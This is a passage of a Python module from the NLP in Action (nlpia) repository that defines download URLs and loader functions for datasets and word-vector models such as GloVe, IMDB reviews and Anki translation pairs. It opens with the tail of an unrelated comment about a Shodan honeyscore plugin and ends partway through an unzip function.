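# below is a hypothetical example from the TEST-NET-2 documentation range:
#
#   from plugins.honeypot import honeypot
#   honeypot("198.51.100.7")
#
# Shodan's honeyscore endpoint returns a numeric score, which the function above
# scales and prints as a percentage.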
|
src/nlpia/loaders.py
|
AAAI-DISIM-UnivAQ/nlpia
| 532 |
66940
|
<filename>src/nlpia/loaders.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Loaders and downloaders for data files and models required for the examples in NLP in Action
>>> df = get_data('cities_us')
>>> df.iloc[:3,:2]
geonameid city
131484 4295856 Indian Hills Cherokee Section
137549 5322551 Agoura
134468 4641562 Midway
Google N-Gram Viewer data (at least the 1-grams) is available with get_data as well.
The smallest 1-gram table is for the "first letter" pos (part of speech tags all alone):
>>> df = get_data('1gram_pos')
>>> df
term_pos year term_freq book_freq
0 _ADP_ 1505 3367 1
1 _ADP_ 1507 4619 1
2 _ADP_ 1515 37423 1
...
The words that start with X is also a pretty small list:
>>> df = get_data('1gram_x')
>>> df
term_pos year term_freq book_freq
0 X'rays 1914 1 1
1 X'rays 1917 1 1
2 X'rays 1919 1 1
3 X'rays 1921 1 1
...
[3929235 rows x 4 columns]
"""
from __future__ import print_function, unicode_literals, division, absolute_import
from builtins import (bytes, dict, int, list, object, range, str, # noqa
ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)
from future import standard_library
standard_library.install_aliases() # noqa
from past.builtins import basestring
# from traceback import format_exc
import os
import re
import json
import logging
import shutil
from traceback import format_exc
from zipfile import ZipFile
from math import ceil
from itertools import product, zip_longest
from requests.exceptions import ConnectionError, InvalidURL, InvalidSchema, InvalidHeader, MissingSchema
from urllib.error import URLError
from copy import deepcopy
import pandas as pd
import tarfile
import ftplib
import spacy
from gensim.models import KeyedVectors
from gensim.models.keyedvectors import REAL, Vocab
from gensim.scripts.glove2word2vec import glove2word2vec
from pugnlp.util import clean_columns
from nlpia.constants import DATA_PATH, BIGDATA_PATH
from nlpia.constants import DATA_INFO_FILE, BIGDATA_INFO_FILE, BIGDATA_INFO_LATEST
from nlpia.constants import INT_MIN, INT_NAN, MIN_DATA_FILE_SIZE
from nlpia.constants import EOL # noqa (not used)
from nlpia.constants import tqdm, no_tqdm
from nlpia.futil import mkdir_p, path_status, find_files # from pugnlp.futil
from nlpia.futil import find_filepath, expand_filepath, normalize_filepath, normalize_ext, ensure_open
from nlpia.futil import read_json, read_text, read_csv
from nlpia.web import get_url_filemeta
from nlpia.web import dropbox_basename, get_url_title, try_parse_url # noqa (not used)
from nlpia.web import requests_get
import ipdb
_parse = None # placeholder for SpaCy parser + language model
np = pd.np
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# logging.config.dictConfig(LOGGING_CONFIG)
# # doesn't display line number, etc
# if os.environ.get('DEBUG'):
# logging.basicConfig(level=logging.DEBUG)
# SMALLDATA_URL = 'http://totalgood.org/static/data'
W2V_FILES = [
'GoogleNews-vectors-negative300.bin.gz',
'glove.6B.zip',
'glove.twitter.27B.zip',
'glove.42B.300d.zip',
'glove.840B.300d.zip',
]
# You probably want to `rm nlpia/src/nlpia/data/bigdata_info.csv` if you modify any of these
# so they don't overwrite what you hardcode within loaders.py here:
ZIP_FILES = {
'GoogleNews-vectors-negative300.bin.gz': None,
'glove.6B.zip': ['glove.6B.50d.w2v.txt', 'glove.6B.100d.w2v.txt', 'glove.6B.200d.w2v.txt', 'glove.6B.300d.w2v.txt'],
'glove.twitter.27B.zip': None,
'glove.42B.300d.zip': None,
'glove.840B.300d.zip': None,
}
ZIP_PATHS = [[os.path.join(BIGDATA_PATH, fn) for fn in ZIP_FILES[k]] if ZIP_FILES[k] else k for k in ZIP_FILES.keys()]
harry_docs = ["The faster Harry got to the store, the faster and faster Harry would get home.",
"Harry is hairy and faster than Jill.",
"Jill is not as hairy as Harry."]
def load_imdb_df(dirpath=os.path.join(BIGDATA_PATH, 'aclImdb'), subdirectories=(('train', 'test'), ('pos', 'neg', 'unsup'))):
""" Walk directory tree starting at `path` to compile a DataFrame of movie review text labeled with their 1-10 star ratings
Returns:
DataFrame: columns=['url', 'rating', 'text'], index=MultiIndex(['train_test', 'pos_neg_unsup', 'id'])
TODO:
Make this more robust/general by allowing the subdirectories to be None and find all the subdirs containing txt files
>> imdb_df().head()
url rating text
index0 index1 index2
train pos 0 http://www.imdb.com/title/tt0453418 9 Bromwell High is a cartoon comedy. It ran at t...
1 http://www.imdb.com/title/tt0210075 7 If you like adult comedy cartoons, like South ...
2 http://www.imdb.com/title/tt0085688 9 Bromwell High is nothing short of brilliant. E...
3 http://www.imdb.com/title/tt0033022 10 "All the world's a stage and its people actors...
4 http://www.imdb.com/title/tt0043137 8 FUTZ is the only show preserved from the exper...
"""
dfs = {}
for subdirs in tqdm(list(product(*subdirectories))):
urlspath = os.path.join(dirpath, subdirs[0], 'urls_{}.txt'.format(subdirs[1]))
if not os.path.isfile(urlspath):
if subdirs != ('test', 'unsup'): # test/ dir doesn't usually have an unsup subdirectory
log.warning('Unable to find expected IMDB review list of URLs: {}'.format(urlspath))
continue
df = pd.read_csv(urlspath, header=None, names=['url'])
# df.index.name = 'id'
df['url'] = series_strip(df.url, endswith='/usercomments')
textsdir = os.path.join(dirpath, subdirs[0], subdirs[1])
if not os.path.isdir(textsdir):
log.warning('Unable to find expected IMDB review text subdirectory: {}'.format(textsdir))
continue
filenames = [fn for fn in os.listdir(textsdir) if fn.lower().endswith('.txt')]
df['index0'] = subdirs[0] # TODO: column names more generic so will work on other datasets
df['index1'] = subdirs[1]
df['index2'] = np.array([int(fn[:-4].split('_')[0]) for fn in filenames])
df['rating'] = np.array([int(fn[:-4].split('_')[1]) for fn in filenames])
texts = []
for fn in filenames:
with ensure_open(os.path.join(textsdir, fn)) as f:
texts.append(f.read())
df['text'] = np.array(texts)
del texts
df.set_index('index0 index1 index2'.split(), inplace=True)
df.sort_index(inplace=True)
dfs[subdirs] = df
return pd.concat(dfs.values())
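# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Assuming the aclImdb archive has already been fetched and extracted under
# BIGDATA_PATH (e.g. via download_unzip('imdb')), the reviews can be loaded and
# sliced by the MultiIndex levels:
#
#   df = load_imdb_df()
#   train_pos = df.loc[('train', 'pos')]       # positive training reviews
#   train_pos[['rating', 'text']].head()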
def load_glove(filepath, batch_size=1000, limit=None, verbose=True):
r""" Load a pretrained GloVE word vector model
First header line of GloVE text file should look like:
400000 50\n
First vector of GloVE text file should look like:
the .12 .22 .32 .42 ... .42
>>> wv = load_glove(os.path.join(BIGDATA_PATH, 'glove_test.txt'))
>>> wv.most_similar('and')[:3]
[(',', 0.92...),
('.', 0.91...),
('of', 0.86...)]
"""
num_dim = isglove(filepath)
tqdm_prog = tqdm if verbose else no_tqdm
wv = KeyedVectors(num_dim)
if limit:
vocab_size = int(limit)
else:
with ensure_open(filepath) as fin:
for i, line in enumerate(fin):
pass
vocab_size = i + 1
wv.vectors = np.zeros((vocab_size, num_dim), REAL)
with ensure_open(filepath) as fin:
batch, words = [], []
for i, line in enumerate(tqdm_prog(fin, total=vocab_size)):
line = line.split()
word = line[0]
vector = np.array(line[1:]).astype(float)
# words.append(word)
# batch.append(vector)
wv.index2word.append(word)
wv.vocab[word] = Vocab(index=i, count=vocab_size - i)
wv.vectors[i] = vector
if len(words) >= batch_size:
# wv[words] = np.array(batch)
batch, words = [], []
if i >= vocab_size - 1:
break
if words:
wv[words] = np.array(batch)
return wv
def load_glove_df(filepath, **kwargs):
""" Load a GloVE-format text file into a dataframe
>>> df = load_glove_df(os.path.join(BIGDATA_PATH, 'glove_test.txt'))
>>> df.index[:3]
Index(['the', ',', '.'], dtype='object', name=0)
>>> df.iloc[0][:3]
1 0.41800
2 0.24968
3 -0.41242
Name: the, dtype: float64
"""
pdkwargs = dict(index_col=0, header=None, sep=r'\s', skiprows=[0], verbose=False, engine='python')
pdkwargs.update(kwargs)
return pd.read_csv(filepath, **pdkwargs)
# def load_glove_format(filepath):
# """ https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """
# # glove_input_file = os.path.join(BIGDATA_PATH, filepath)
# word2vec_output_file = os.path.join(BIGDATA_PATH, filepath.split(os.path.sep)[-1][:-4] + '.w2v.txt')
# if not os.path.isfile(word2vec_output_file): # TODO: also check file size
# glove2word2vec(glove_input_file=filepath, word2vec_output_file=word2vec_output_file)
# return KeyedVectors.load_word2vec_format(word2vec_output_file)
def get_en2fr(url='http://www.manythings.org/anki/fra-eng.zip'):
""" Download and parse English->French translation dataset used in Keras seq2seq example """
download_unzip(url)
return pd.read_table(url, compression='zip', header=None, skip_blank_lines=True, sep='\t', skiprows=0, names='en fr'.split())
def load_anki_df(language='deu'):
""" Load into a DataFrame statements in one language along with their translation into English
>>> df = get_data('zsm')
>>> list(list(df.columns)[:2])
['eng', 'zsm']
>>> len(df) > 100
True
>> get_data('zsm').head(2)
eng zsm
0 Are you new? Awak baru?
1 Forget it. Lupakanlah.
"""
if os.path.isfile(language):
filepath = language
lang = re.search('[a-z]{3}-eng/', filepath).group()[:3].lower()
else:
lang = (language or 'deu').lower()[:3]
filepath = os.path.join(BIGDATA_PATH, '{}-eng'.format(lang), '{}.txt'.format(lang))
df = pd.read_table(filepath, skiprows=1, header=None)
for i, newc in enumerate(['eng', lang, 'license']):
df.columns = [newc if str(c).lower().strip().startswith(newc) else c for c in df.columns]
if newc not in df.columns and i < len(df.columns):
columns = list(df.columns)
columns[i] = newc
df.columns = columns
return df
BIG_URLS = {
'w2v': (
'https://www.dropbox.com/s/965dir4dje0hfi4/GoogleNews-vectors-negative300.bin.gz?dl=1',
1647046227,
'GoogleNews-vectors-negative300.bin.gz',
KeyedVectors.load_word2vec_format,
{'binary': True},
),
'words_google_news': (
'https://www.dropbox.com/s/9pm0js9qdjr04jy/words_google_news.txt.gz?dl=1',
3015517,
),
'glove_twitter': (
'https://nlp.stanford.edu/data/glove.twitter.27B.zip',
1520408563,
),
'glove_small': (
'https://nlp.stanford.edu/data/glove.6B.zip',
862182613,
os.path.join('glove.6B', 'glove.6B.50d.txt'),
load_glove,
),
'glove_large': (
'https://nlp.stanford.edu/data/glove.840B.300d.zip',
2176768927,
),
'glove_medium': (
'https://nlp.stanford.edu/data/glove.42B.300d.zip',
1877800501,
),
'slang': (
'https://www.dropbox.com/s/43c22018fbfzypd/slang.csv.gz?dl=1',
117633024,
),
'tweets': (
'https://www.dropbox.com/s/5gpb43c494mc8p0/tweets.csv.gz?dl=1',
311725313,
),
'crimedata': (
'https://www.dropbox.com/s/mg4yokpifu3n6u5/crimedata.csv.gz?dl=1',
2126689,
),
'cities': (
'https://www.dropbox.com/s/tcri5eyzpabhnyy/cities.csv.gz?dl=1',
8396891,
),
'cities_us_wordvectors': (
'https://www.dropbox.com/s/7ujezmo03b637q3/cities_us_wordvectors.csv.gz?dl=1',
8451128,
),
'dialog': (
'https://www.dropbox.com/s/5543bkihxflzry9/dialog.csv.gz?dl=1',
4415234,
),
'cornellmovies': (
'http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip',
9916637,
'cornell_movie_dialogs_corpus',
),
'save_dialog_tweets': (
'https://www.dropbox.com/s/tlrr9bm45uzm9yl/save_dialog_tweets.txt.gz?dl=1',
4517000,
),
'lsa_tweets': (
'https://www.dropbox.com/s/rpjt0d060t4n1mr/lsa_tweets_5589798_2003588x200.tar.gz?dl=1',
3112841563,
),
'lsa_tweets_pickle': (
'https://www.dropbox.com/s/7k0nvl2dx3hsbqp/lsa_tweets_5589798_2003588x200.pkl.projection.u.npy?dl=1',
2900000000,
),
'ubuntu_dialog_1500k': (
'https://www.dropbox.com/s/krvi79fbsryytc2/ubuntu_dialog_1500k.csv.gz?dl=1',
296098788,
),
'ubuntu_dialog_test': (
'https://www.dropbox.com/s/47mqbx0vgynvnnj/ubuntu_dialog_test.csv.gz?dl=1',
31273,
),
'imdb': (
'https://www.dropbox.com/s/yviic64qv84x73j/aclImdb_v1.tar.gz?dl=1',
84125825,
'aclImdb', # directory for extractall
load_imdb_df, # postprocessor to combine text files into a single DataFrame
),
'imdb_test': (
'https://www.dropbox.com/s/cpgrf3udzkbmvuu/aclImdb_test.tar.gz?dl=1',
10858,
'aclImdb_test', # directory for extractall
load_imdb_df,
),
'alice': (
# 'https://www.dropbox.com/s/py952zad3mntyvp/aiml-en-us-foundation-alice.v1-9.zip?dl=1',
'https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/' \
'aiml-en-us-foundation-alice/aiml-en-us-foundation-alice.v1-9.zip',
8249482,
),
# BRFSS annual mental health survey
'cdc': (
'https://www.cdc.gov/brfss/annual_data/2016/files/LLCP2016ASC.zip',
52284490,
),
}
for yr in range(2011, 2017):
BIG_URLS['cdc' + str(yr)[-2:]] = ('https://www.cdc.gov/brfss/annual_data/{yr}/files/LLCP{yr}ASC.zip'.format(yr=yr), None)
# Aliases for bigurls. Canonical name given on line by itself.
BIG_URLS['cornell'] = BIG_URLS['cornellmoviedialog'] = BIG_URLS['cornellmoviedialogs'] = BIG_URLS['cornell_movie_dialog'] = \
BIG_URLS['cornell_movie_dialogs'] = BIG_URLS['cornell_movie_dialog_corpus'] = BIG_URLS['cornell_movie_dialogs_corpus'] = \
BIG_URLS['cornellmovies']
BIG_URLS['word2vec'] = BIG_URLS['wv'] = \
BIG_URLS['w2v']
BIG_URLS['glove'] = BIG_URLS['glovesm'] = BIG_URLS['glove-sm'] = BIG_URLS['glove_sm'] = BIG_URLS['glove-small'] = \
BIG_URLS['glove_small']
BIG_URLS['ubuntu'] = BIG_URLS['ubuntu_dialog'] = \
BIG_URLS['ubuntu_dialog_1500k']
BIG_URLS['glovelg'] = BIG_URLS['glove_lg'] = BIG_URLS['glove-lg'] = BIG_URLS['glove-large'] = \
BIG_URLS['glove_large']
BIG_URLS['glovemed'] = BIG_URLS['glove_med'] = BIG_URLS['glove-med'] = BIG_URLS['glove-medium'] = \
BIG_URLS['glove_medium']
def generate_big_urls_glove(bigurls=None):
""" Generate a dictionary of URLs for various combinations of GloVe training set sizes and dimensionality """
bigurls = bigurls or {}
for num_dim in (50, 100, 200, 300):
# not all of these dimensionality, and training set size combinations were trained by Stanford
for suffixes, num_words in zip(
('sm -sm _sm -small _small'.split(),
'med -med _med -medium _medium'.split(),
'lg -lg _lg -large _large'.split()),
(6, 42, 840)
):
for suf in suffixes[:-1]:
name = 'glove' + suf + str(num_dim)
dirname = 'glove.{num_words}B'.format(num_words=num_words)
# glove.42B.300d.w2v.txt
filename = dirname + '.{num_dim}d.w2v.txt'.format(num_dim=num_dim)
# seed the alias named URL with the URL for that training set size's canonical name
bigurl_tuple = BIG_URLS['glove' + suffixes[-1]]
bigurls[name] = list(bigurl_tuple[:2])
bigurls[name].append(os.path.join(dirname, filename))
bigurls[name].append(load_glove)
bigurls[name] = tuple(bigurls[name])
return bigurls
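# Illustrative note (added for clarity): the generator above produces alias keys of the
# form 'glove' + suffix + str(num_dim), so after the update() below entries such as
# BIG_URLS['glove-sm50'], BIG_URLS['glove_med100'] and BIG_URLS['glovelg300'] all point
# at the matching Stanford GloVe zip plus the dimension-specific *.w2v.txt member inside it.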
BIG_URLS.update(generate_big_urls_glove())
ANKI_LANGUAGES = 'afr arq ara aze eus bel ben ber bul yue cat cbk cmn chv hrv ces dan nld est fin fra glg kat ' \
'deu ell heb hin hun isl ind ita jpn kha khm kor lvs lit nds mkd zsm mal mri mar max nob pes ' \
'pol por ron rus srp slk slv spa swe tgl tam tat tha tur ukr urd uig vie'.split()
ANKI_LANGUAGE_SYNONYMS = list(zip('fre esp ger french spanish german turkish turkey dut dutch'.split(),
'fra spa deu fra spa deu tur tur dan dan'.split()))
LANG2ANKI = dict((lang[:2], lang) for lang in ANKI_LANGUAGES)
"""
>>> len(ANKI_LANGUAGES) - len(LANG2ANKI)
9
"""
ENGLISHES = 'eng usa us bri british american aus australian'.split()
for lang in ANKI_LANGUAGES:
for eng in ENGLISHES:
BIG_URLS[lang] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df)
BIG_URLS[lang + '-eng'] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang),
1000, '{}-{}'.format(lang, eng), load_anki_df)
for syn, lang in ANKI_LANGUAGE_SYNONYMS:
BIG_URLS[syn] = BIG_URLS[lang]
for eng in ENGLISHES:
BIG_URLS[lang + '-' + eng] = BIG_URLS[lang + '-eng']
"""
Google N-Gram Viewer meta data is from:
* [GOOGLE_NGRAM files](https://storage.googleapis.com/books/ngrams/books/datasetsv2.html)
* [GOOGLE_NGRAM data format](https://books.google.com/ngrams/info)
"""
GOOGLE_NGRAM_URL = 'http://storage.googleapis.com/books/ngrams/books/'
GOOGLE_NGRAM_NAMES = '0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o other p pos punctuation q r s t u v w x y z'.split()
GOOGLE_NGRAM_FILE = 'googlebooks-eng-all-1gram-20120701-{}.gz'
for name in GOOGLE_NGRAM_NAMES:
BIG_URLS['1gram_{}'.format(name)] = (GOOGLE_NGRAM_URL + GOOGLE_NGRAM_FILE.format(name),
1000, GOOGLE_NGRAM_FILE.format(name),
pd.read_table,
{'sep': '\t', 'header': None, 'names': 'term_pos year term_freq book_freq'.split()})
try:
BIGDATA_INFO = pd.read_csv(BIGDATA_INFO_FILE, header=0)
log.warning('Found BIGDATA index in {default} so it will overwrite nlpia.loaders.BIG_URLS !!!'.format(
default=BIGDATA_INFO_FILE))
except (IOError, pd.errors.EmptyDataError):
BIGDATA_INFO = pd.DataFrame(columns='name url file_size'.split())
log.info('No BIGDATA index found in {default} so copy {latest} to {default} if you want to "freeze" it.'.format(
default=BIGDATA_INFO_FILE, latest=BIGDATA_INFO_LATEST))
BIG_URLS.update(dict(zip(BIGDATA_INFO.name, zip(BIGDATA_INFO.url, BIGDATA_INFO.file_size))))
BIGDATA_INFO = pd.DataFrame(list(
zip(BIG_URLS.keys(), list(zip(*BIG_URLS.values()))[0], list(zip(*BIG_URLS.values()))[1])),
columns='name url file_size'.split())
BIGDATA_INFO.to_csv(BIGDATA_INFO_LATEST)
# FIXME: consolidate with DATA_INFO or BIG_URLS
DATA_NAMES = {
'pointcloud': os.path.join(DATA_PATH, 'pointcloud.csv.gz'),
'hutto_tweets0': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv.gz'),
'hutto_tweets': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv'),
'hutto_nyt': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/nytEditorialSnippets_GroundTruth.csv.gz'),
'hutto_movies': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/movieReviewSnippets_GroundTruth.csv.gz'),
'hutto_products': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/amazonReviewSnippets_GroundTruth.csv.gz'),
}
# FIXME: put these in BIG_URLS, and test/use them with get_data()
DDL_DS_QUESTIONS_URL = 'http://minimum-entropy.districtdatalabs.com/api/questions/?format=json'
DDL_DS_ANSWERS_URL = 'http://minimum-entropy.districtdatalabs.com/api/answers/?format=json'
# Files to load into local variables like loaders.kite_text loaders.kite_history
TEXTS = ['kite_text.txt', 'kite_history.txt']
CSVS = ['mavis-batey-greetings.csv', 'sms-spam.csv']
DATA_INFO = pd.read_csv(DATA_INFO_FILE, header=0)
def rename_file(source, dest):
""" Rename (mv) file(s) from source to dest
>>> from tempfile import mkdtemp
>>> tmpdir = mkdtemp(suffix='doctest_rename_file', prefix='tmp')
>>> fout = ensure_open(os.path.join(tmpdir, 'fake_data.bin.gz'), 'w')
>>> fout.write(b'fake nlpia.loaders.rename_file')
30
>>> fout.close()
>>> dest = rename_file(os.path.join(tmpdir, 'fake_data.bin.gz'), os.path.join(tmpdir, 'Fake_Data.bin.gz'))
>>> os.path.isfile(os.path.join(tmpdir, 'Fake_Data.bin.gz'))
True
"""
log.debug('nlpia.loaders.rename_file(source={}, dest={})'.format(source, dest))
if not isinstance(source, str):
dest = [dest] if isinstance(dest, str) else dest
return [rename_file(s, d) for (s, d) in zip_longest(source, dest, fillvalue=[source, dest][int(len(source) > len(dest))])]
log.debug('nlpia.loaders.os.rename(source={}, dest={})'.format(source, dest))
if source == dest:
return dest
os.rename(source, dest)
return dest
def normalize_ext_rename(filepath):
""" normalize file ext like '.tgz' -> '.tar.gz' and '300d.txt' -> '300d.glove.txt' and rename the file
>>> pth = os.path.join(DATA_PATH, 'sms_slang_dict.txt')
>>> pth == normalize_ext_rename(pth)
True
"""
# log.warning('normalize_ext.filepath=' + str(filepath))
new_file_path = normalize_ext(filepath)
# log.warning('download_unzip.new_filepath=' + str(new_file_path))
# FIXME: fails when name is a url filename
filepath = rename_file(filepath, new_file_path)
log.warning('download_unzip.filepath=' + str(filepath))
return filepath
def untar(fname, verbose=True):
""" Unzip and untar a tar.gz file into a subdir of the BIGDATA_PATH directory """
if fname.lower().endswith(".tar.gz"):
dirpath = os.path.join(BIGDATA_PATH, os.path.basename(fname)[:-7])
if os.path.isdir(dirpath):
return dirpath
with tarfile.open(fname) as tf:
members = tf.getmembers()
for member in tqdm(members, total=len(members)):
tf.extract(member, path=BIGDATA_PATH)
dirpath = os.path.join(BIGDATA_PATH, members[0].name)
if os.path.isdir(dirpath):
return dirpath
else:
log.warning("Not a tar.gz file: {}".format(fname))
def series_rstrip(series, endswith='/usercomments', ignorecase=True):
""" Strip a suffix str (`endswith` str) from a df column or pd.Series of type str """
return series_strip(series, startswith=None, endswith=endswith, startsorendswith=None, ignorecase=ignorecase)
def series_lstrip(series, startswith='http://', ignorecase=True):
""" Strip a prefix str (`startswith` str) from a df column or pd.Series of type str """
return series_strip(series, startswith=startswith, endswith=None, startsorendswith=None, ignorecase=ignorecase)
def series_strip(series, startswith=None, endswith=None, startsorendswith=None, ignorecase=True):
""" Strip a suffix/prefix str (`endswith`/`startswith` str) from a df column or pd.Series of type str """
if ignorecase:
mask = series.str.lower()
# guard against None so series_lstrip/series_rstrip (which pass only one of the two) don't crash
endswith = endswith.lower() if endswith is not None else endswith
startswith = startswith.lower() if startswith is not None else startswith
else:
mask = series
if not (startsorendswith or endswith or startswith):
log.warning('In series_strip(): You must specify endswith, startswith, or startsorendswith string arguments.')
return series
if startsorendswith:
startswith = endswith = startsorendswith
if endswith:
mask = mask.str.endswith(endswith)
series[mask] = series[mask].str[:-len(endswith)]
if startswith:
mask = mask.str.startswith(startswith)
series[mask] = series[mask].str[len(startswith):]
return series
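# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# series_strip() and its thin wrappers mutate (and return) a pandas Series of str;
# the example values below are hypothetical:
#
#   urls = pd.Series(['http://example.com/usercomments', 'http://example.org'])
#   series_rstrip(urls)   # -> ['http://example.com', 'http://example.org']
#   series_lstrip(urls)   # -> ['example.com', 'example.org']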
def endswith_strip(s, endswith='.txt', ignorecase=True):
""" Strip a suffix from the end of a string
>>> endswith_strip('http://TotalGood.com', '.COM')
'http://TotalGood'
>>> endswith_strip('http://TotalGood.com', endswith='.COM', ignorecase=False)
'http://TotalGood.com'
"""
if ignorecase:
if s.lower().endswith(endswith.lower()):
return s[:-len(endswith)]
else:
if s.endswith(endswith):
return s[:-len(endswith)]
return s
def startswith_strip(s, startswith='http://', ignorecase=True):
""" Strip a prefix from the beginning of a string
>>> startswith_strip('HTtp://TotalGood.com', 'HTTP://')
'TotalGood.com'
>>> startswith_strip('HTtp://TotalGood.com', startswith='HTTP://', ignorecase=False)
'HTtp://TotalGood.com'
"""
if ignorecase:
if s.lower().startswith(startswith.lower()):
return s[len(startswith):]
else:
if s.startswith(startswith):
return s[len(startswith):]
return s
def combine_dfs(dfs, index_col='index0 index1 index2'.split()):
if isinstance(dfs, dict):
dfs = list(dfs.values())
def get_longest_table(url='https://www.openoffice.org/dev_docs/source/file_extensions.html', header=0):
""" Retrieve the HTML tables from a URL and return the longest DataFrame found
>>> get_longest_table('https://en.wikipedia.org/wiki/List_of_sovereign_states').columns
Index(['Common and formal names', 'Membership within the UN System[a]',
'Sovereignty dispute[b]',
'Further information on status and recognition of sovereignty[d]'],
dtype='object')
"""
dfs = pd.read_html(url, header=header)
return longest_table(dfs)
def get_leet_map():
r""" Retrieve mapping from English letters to l33t like E => 3 or A => /\ or /-\ or @ """
df = get_longest_table(
'https://sites.google.com/site/inhainternetlanguage/different-internet-languages/l33t/list-of-l33ts', header=None)
df = df.drop(index=0).iloc[:, :2]
df.columns = ['eng', 'l33t']
df['l33t'] = df['l33t'].str.split(',')
table = []
for i, row in df.iterrows():
for s in row['l33t']:
table.append((row['eng'].strip(), s.strip()))
table = pd.DataFrame(table, columns=df.columns)
leet_path = os.path.join(DATA_PATH, 'l33t.csv')
log.info('Saving l33t dictionary (character mapping) to {}'.format(leet_path))
table.to_csv(leet_path)
return table
def get_netspeak_map():
""" Retrieve mapping from chat/text abbreviations and acronyms like LMK => Let Me Know """
dfs = pd.read_html('https://www.webopedia.com/quick_ref/textmessageabbreviations.asp')
df = dfs[0].drop(index=0)
df.columns = ['abbrev', 'definition']
csv_path = os.path.join(DATA_PATH, 'netspeak.csv')
log.info('Saving netspeak dictionary (word mapping) to {}'.format(csv_path))
df.to_csv(csv_path)
return df
# more nontabular lists at 'https://simple.wikipedia.org/wiki/Leet
def longest_table(dfs):
""" Return the single longest DataFrame from among an array/list/tuple of DataFrames
Useful for automagically finding the DataFrame you want when using pd.read_html() on a Wikipedia page.
"""
sorted_indices = sorted((len(df if hasattr(df, '__len__') else []), i) for i, df in enumerate(dfs))
return dfs[sorted_indices[-1][1]]
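# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# pd.read_html() returns every <table> it finds; longest_table() picks the one with
# the most rows, which is usually the table you actually want from a Wikipedia page:
#
#   dfs = pd.read_html('https://en.wikipedia.org/wiki/List_of_sovereign_states')
#   states = longest_table(dfs)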
def get_filename_extensions(url='https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html'):
""" Load a DataFrame of filename extensions from the indicated url
> df = get_filename_extensions('https://www.webopedia.com/quick_ref/fileextensionsfull.asp')
> df = get_filename_extensions('https://www.openoffice.org/dev_docs/source/file_extensions.html')
>>> df = get_filename_extensions('https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html')
>>> df.head(2)
ext description
0 .a UNIX static library file.
1 .asm Non-UNIX assembler source file.
"""
df = get_longest_table(url)
columns = list(df.columns)
columns[0] = 'ext'
columns[1] = 'description'
if len(columns) > 2:
columns[2] = 'details'
df.columns = columns
return df
#######################################################################
# Populate some local string variables with text files from DATA_PATH
for filename in TEXTS:
with ensure_open(os.path.join(DATA_PATH, filename)) as fin:
locals()[filename.split('.')[0]] = fin.read()
del fin
for filename in CSVS:
locals()['df_' + filename.split('.')[0].replace('-', '_')] = read_csv(
os.path.join(DATA_PATH, filename))
def migrate_big_urls(big_urls=BIG_URLS, inplace=True):
r""" Migrate the big_urls table schema/structure from a dict of lists to a dict of dicts
>>> big_urls = {'x': (1, 2, 3, "4x"), 'y': ("yme", "cause")}
>>> inplace = migrate_big_urls(big_urls=big_urls)
>>> inplace
{'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}}
>>> inplace is big_urls
True
>>> big_urls = {'x': [1, 2, 3, "4x"], 'y': ["yme", "cause"]}
>>> copied = migrate_big_urls(big_urls=big_urls, inplace=False)
>>> copied
{'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}}
>>> copied is big_urls
False
>>> copied['x'] is big_urls['x']
False
>>> 1 is copied['x'][0] is big_urls['x'][0]
True
"""
if not inplace:
big_urls = deepcopy(big_urls)
for name, meta in big_urls.items():
big_urls[name] = dict(zip(range(len(meta)), meta))
# big_urls[name]['filenames'] = [normalize_ext(big_urls)]
return big_urls
BIG_URLS = migrate_big_urls(BIG_URLS)
def normalize_glove(filepath):
r""" https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """
# FIXME
filepath = expand_filepath(filepath)
raise NotImplementedError()
def unzip(filepath, verbose=True):
r""" Unzip GloVE models and convert to word2vec binary models (gensim.KeyedVectors)
The only kinds of files that are returned are "*.asc" and "*.txt" and only after renaming.
"""
filepath = expand_filepath(filepath)
filename = os.path.basename(filepath)
tqdm_prog = tqdm if verbose else no_tqdm
z = ZipFile(filepath)
unzip_dir = filename.split('.')[0] if filename.split('.')[0] else os.path.splitext(filename)[0]
unzip_dir = os.path.join(BIGDATA_PATH, unzip_dir)
if not os.path.isdir(unzip_dir) or not len(os.listdir(unzip_dir)) == len(z.filelist):
z.extractall(path=unzip_dir)
log.info('unzip_dir contains: {}'.format(os.listdir(unzip_dir)))
# for f in os.listdir(unzip_dir):
# if f.lower().endswith('about.txt'):
# os.remove(os.path.join(unzip_dir, f))
for f in tqdm_prog(os.listdir(unzip_dir)):
if f[-1] in ' \t\r\n\f':
bad_path = os.path.join(unzip_dir, f)
log.warning('Stripping whitespace from end of filename: {} -> {}'.format(
repr(bad_path), repr(bad_path.rstrip())))
shutil.move(bad_path, bad_path.rstrip())
# rename_file(source=bad_path, dest=bad_path.rstrip())
anki_paths = [os.path.join(unzip_dir, f) for f in os.listdir(unzip_dir)
if f.lower()[:3] in ANKI_LANGUAGES and f.lower()[3:] == '.txt']
log.info('anki_paths: {}'.format(anki_paths))
w2v_paths = [os.path.join(BIGDATA_PATH, f[:-4] + '.w2v.txt') for f in os.listdir(unzip_dir)
if f.lower().endswith('.txt') and 'glove' in f.lower()]
for f, word2vec_output_file in zip(os.listdir(unzip_dir), w2v_paths):
glove_input_file = os.path.join(unzip_dir, f)
